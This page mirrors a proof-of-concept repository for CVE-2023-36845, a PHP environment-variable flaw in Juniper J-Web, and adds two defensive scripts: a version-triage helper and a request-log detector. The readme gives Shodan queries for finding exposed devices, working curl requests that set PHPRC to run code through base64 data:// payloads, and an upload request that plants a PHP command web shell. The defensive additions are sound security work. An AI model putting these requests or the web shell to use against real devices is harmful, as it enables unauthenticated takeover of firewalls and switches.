
CVE-2023-36845 PoC — Junos OS: EX and SRX Series: A PHP vulnerability in J-Web allows an unauthenticated to control an important environment variable

Source
Associated Vulnerability
Title: Junos OS: EX and SRX Series: A PHP vulnerability in J-Web allows an unauthenticated to control an important environment variable (CVE-2023-36845)
Description: A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series and SRX Series allows an unauthenticated, network-based attacker to remotely execute code. Using a crafted request which sets the variable PHPRC, an attacker is able to modify the PHP execution environment, allowing the injection and execution of code. This issue affects Juniper Networks Junos OS on EX Series and SRX Series:
* All versions prior to 20.4R3-S9;
* 21.1 versions 21.1R1 and later;
* 21.2 versions prior to 21.2R3-S7;
* 21.3 versions prior to 21.3R3-S5;
* 21.4 versions prior to 21.4R3-S5;
* 22.1 versions prior to 22.1R3-S4;
* 22.2 versions prior to 22.2R3-S2;
* 22.3 versions prior to 22.3R2-S2, 22.3R3-S1;
* 22.4 versions prior to 22.4R2-S1, 22.4R3;
* 23.2 versions prior to 23.2R1-S1, 23.2R2.
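The affected-version list above is awkward to apply by hand across a fleet, because each Junos train has its own R branch and service-release (S) cut-off. The following triage helper is an added example written for this page; it is not part of the PoC repository. It transcribes the ranges from the advisory text above into a table and classifies a version string as affected, fixed, or not covered by that text. The version grammar it assumes (`major.minorR<release>-S<service>`, ignoring any trailing build or platform suffix) is a simplification, and the device inventory at the bottom is constructed.

```python
import re
from typing import Dict, List, Optional, Tuple

# Fixed (first unaffected) releases per Junos train, transcribed from the
# advisory text above. An empty list means no fixed release is listed for
# that train (21.1: "21.1R1 and later" are all affected). Trains older than
# 20.4 fall under "All versions prior to 20.4R3-S9" and need no entry.
FIXED_BY_TRAIN: Dict[str, List[str]] = {
    "20.4": ["20.4R3-S9"],
    "21.1": [],
    "21.2": ["21.2R3-S7"],
    "21.3": ["21.3R3-S5"],
    "21.4": ["21.4R3-S5"],
    "22.1": ["22.1R3-S4"],
    "22.2": ["22.2R3-S2"],
    "22.3": ["22.3R2-S2", "22.3R3-S1"],
    "22.4": ["22.4R2-S1", "22.4R3"],
    "23.2": ["23.2R1-S1", "23.2R2"],
}

# major.minor, R<release>, optional -S<service release>. Simplifying
# assumption: any further suffix (build number, "-EVO", ...) is ignored.
_VER_RE = re.compile(r"^(\d+)\.(\d+)R(\d+)(?:-S(\d+))?")


def parse_junos(version: str) -> Tuple[int, int, int, int]:
    """'21.2R3-S6' -> (21, 2, 3, 6); a missing -S part counts as service release 0."""
    m = _VER_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised Junos version string: {version!r}")
    major, minor, rel, svc = m.groups()
    return int(major), int(minor), int(rel), int(svc or 0)


def is_affected(version: str) -> Optional[bool]:
    """True  -> inside an affected range of the advisory.
    False -> at or beyond the fixed release for its R branch.
    None  -> the advisory text on this page does not cover that train / branch."""
    major, minor, rel, svc = parse_junos(version)
    if (major, minor) < (20, 4):
        return True                      # "All versions prior to 20.4R3-S9"
    train = f"{major}.{minor}"
    if train not in FIXED_BY_TRAIN:
        return None                      # e.g. 23.1 is not mentioned in the text
    fixed = [parse_junos(f) for f in FIXED_BY_TRAIN[train]]
    if not fixed:
        return True                      # 21.1: no fix listed, every release affected
    same_branch = [f for f in fixed if f[2] == rel]
    if same_branch:
        return svc < same_branch[0][3]   # same R branch: compare service releases
    fixed_branches = [f[2] for f in fixed]
    if rel < min(fixed_branches):
        return True                      # older R branch than any listed fix
    if rel > max(fixed_branches):
        return False                     # newer R branch than every listed fix
    return None                          # R branch between two listed fixes: not stated


def triage(inventory: Dict[str, str]) -> Dict[str, List[str]]:
    """Group device names by triage result: 'affected', 'fixed' or 'unknown'."""
    out: Dict[str, List[str]] = {"affected": [], "fixed": [], "unknown": []}
    for device, version in inventory.items():
        verdict = is_affected(version)
        key = "unknown" if verdict is None else ("affected" if verdict else "fixed")
        out[key].append(device)
    return out


if __name__ == "__main__":
    # Constructed inventory, not real devices.
    sample = {"srx-edge-1": "21.2R3-S6", "ex-core-1": "22.3R3", "srx-dc-2": "22.4R3",
              "ex-access-7": "19.4R3-S2", "srx-lab": "23.1R1"}
    for bucket, devices in triage(sample).items():
        print(f"{bucket}: {', '.join(devices) or '-'}")
```

Note the per-branch semantics: `22.3R3` (no service release) is still affected because the fix for that branch is `22.3R3-S1`, while `22.4R2-S5` is fixed even though it sorts before `22.4R3`, because its own branch was fixed at `22.4R2-S1`. Trains the page does not mention (for example 23.1) come back as unknown rather than being guessed.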
Description
Juniper Firewalls CVE-2023-36845 - RCE
Readme
<h1 align=center>CVE-2023-36845</h1>
<p align="center">
    <img width=60% height=60% src="https://github.com/kljunowsky/CVE-2023-36845/assets/104329412/d8f4be14-148b-44ff-a294-25662f6007a6">
</p>



## Description

CVE-2023-36845 is a PHP environment variable manipulation vulnerability affecting Juniper SRX firewalls and EX switches. Juniper rates it as medium severity; this write-up shows how this single vulnerability can be chained into remote, unauthenticated code execution.

## Search - Shodan
```
title:"Juniper Web Device Manager"
```
<img width="1840" alt="image" src="https://github.com/kljunowsky/CVE-2023-36845/assets/104329412/5b4224e1-7e5b-45fe-b2ee-0b1658c20b0d">

```
title:"Juniper" http.favicon.hash:2141724739
```

<img width="1840" alt="image" src="https://github.com/kljunowsky/CVE-2023-36845/assets/104329412/84aca479-7b9e-4a4d-84f0-8e678c367548">

## Usage 🛠
### Detection
```
python3 CVE-2023-36845.py -f targets.txt -o output.txt
```

## RCE 🧨
### Option 1 
Any PHP stream wrapper can be combined with `auto_prepend_file`; the `data://` wrapper is the most convenient because it supplies the prepended "secondary file" inline. The request below points `PHPRC` at `/dev/fd/0`, so PHP reads its ini directives from the request body, and the `<? phpinfo(); ?>` embedded in the `data://` URI is executed:

```
curl "http://target.tld/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg=="'
```
Execute the `whoami` command, with the prepended file being:

`<?php shell_exec('whoami'); ?>`
```
curl "http://target.tld/?PHPRC=/dev/fd/0" --data-binary $'allow_url_include=1\nauto_prepend_file="data://text/plain;base64,PD9waHAgc2hlbGxfZXhlYygnd2hvYW1pJyk7ID8+Cg=="'
```

### Option 2
Upload a file with the following contents:

`<?php if(isset($_REQUEST[cmd])){ echo "<pre>"; $cmd = ($_REQUEST[cmd]); system($cmd); echo "</pre>"; die; }?>`

```
$ curl http://target.tld/webauth_operation.php -d 'rs=do_upload&rsargs[]=[{"fileName": "shell.php", "fileData": ",PD9waHAgaWYoaXNzZXQoJF9SRVFVRVNUW2NtZF0pKXsgZWNobyAiPHByZT4iOyAkY21kID0gKCRfUkVRVUVTVFtjbWRdKTsgc3lzdGVtKCRjbWQpOyBlY2hvICI8L3ByZT4iOyBkaWU7IH0/Pgo=", "csize": 110}]'
```
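Both options above leave distinctive traces in request logs: a `PHPRC` parameter in the query string, php.ini directives (`allow_url_include`, `auto_prepend_file`) in a request body, and a `do_upload` call to `webauth_operation.php` whose `rsargs[]` names a `.php` file. The detector below is an added example for defenders and is not part of the PoC repository. It assumes a reverse proxy or WAF that logs each request as one JSON line with `ts`, `src`, `method`, `uri` and `body` fields (those field names are this example's own assumption), and the sample records are constructed to mirror the two options documented above.

```python
import json
from typing import Dict, List
from urllib.parse import parse_qs, urlsplit

# Constructed sample records (not real traffic). The first two mirror the
# PHPRC/php.ini request and the do_upload request shown on this page; the
# other two are ordinary J-Web activity that should not be flagged.
SAMPLE_LOG = r'''
{"ts":"2023-08-19T10:01:02Z","src":"203.0.113.7","method":"GET","uri":"/?PHPRC=/dev/fd/0","body":"allow_url_include=1\nauto_prepend_file=\"data://text/plain;base64,PD8KICAgcGhwaW5mbygpOwo/Pg==\""}
{"ts":"2023-08-19T10:01:05Z","src":"203.0.113.7","method":"POST","uri":"/webauth_operation.php","body":"rs=do_upload&rsargs[]=[{\"fileName\": \"shell.php\", \"fileData\": \",PD9waHA=\", \"csize\": 110}]"}
{"ts":"2023-08-19T10:02:00Z","src":"198.51.100.4","method":"GET","uri":"/login.php","body":""}
{"ts":"2023-08-19T10:02:30Z","src":"198.51.100.4","method":"POST","uri":"/webauth_operation.php","body":"rs=get_status&rsargs[]=[]"}
'''

PHP_INI_DIRECTIVES = ("auto_prepend_file", "allow_url_include")
PHP_SUFFIXES = (".php", ".phtml", ".phar")


def inspect_request(rec: Dict[str, str]) -> List[str]:
    """Return a list of human-readable findings for one logged request."""
    findings: List[str] = []
    parts = urlsplit(rec.get("uri", ""))
    query = parse_qs(parts.query, keep_blank_values=True)

    # Rule 1: PHPRC must never be user-controlled; any occurrence is suspicious.
    if any(key.lower() == "phprc" for key in query):
        findings.append("PHPRC supplied in query string (php.ini path override)")

    # Rule 2: ini directives in a body only make sense if PHP is reading
    # the body as its configuration file.
    body = rec.get("body", "")
    if any(d in body.lower() for d in PHP_INI_DIRECTIVES):
        findings.append("php.ini directives in request body")

    # Rule 3: J-Web do_upload of a PHP file via the rsargs[] JSON argument.
    if parts.path.endswith("/webauth_operation.php"):
        form = parse_qs(body, keep_blank_values=True)
        if form.get("rs", [""])[0] == "do_upload":
            for raw in form.get("rsargs[]", []):
                try:
                    args = json.loads(raw)
                except ValueError:
                    continue            # malformed argument: nothing to inspect
                for arg in args if isinstance(args, list) else []:
                    name = str(arg.get("fileName", "")) if isinstance(arg, dict) else ""
                    if name.lower().endswith(PHP_SUFFIXES):
                        findings.append(f"J-Web do_upload of PHP file {name!r}")
    return findings


def scan(log_text: str) -> List[Dict[str, object]]:
    """Run inspect_request over JSON-lines log text; return only records with findings."""
    hits: List[Dict[str, object]] = []
    for line in log_text.strip().splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        found = inspect_request(rec)
        if found:
            hits.append({"ts": rec.get("ts"), "src": rec.get("src"),
                         "uri": rec.get("uri"), "findings": found})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['src']} {hit['uri']}")
        for f in hit["findings"]:
            print(f"    - {f}")
```

Rule 1 alone is a high-confidence signal, since no legitimate J-Web request passes `PHPRC`; rules 2 and 3 corroborate it and also catch the upload path on its own. Run the same rules over historical proxy logs to establish whether a device was targeted before it was patched.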

## Parameters 🧰 

Parameter | Description | Type
------------ | ------------- | -------------
--file / -f | Input targets file | File
-o | Output file | File

## Contact Me 📇

[LinkedIn - Milan Jovic](https://www.linkedin.com/in/milan-jovic-sec/)


File Snapshot

```
[4.0K] /data/pocs/fb6d5c1b4cb7cd6a43a2e9b512aefb1c6753b881
├── [1.4K] CVE-2023-36845.py
├── [1.0K] LICENSE
└── [2.4K] README.md

0 directories, 3 files
```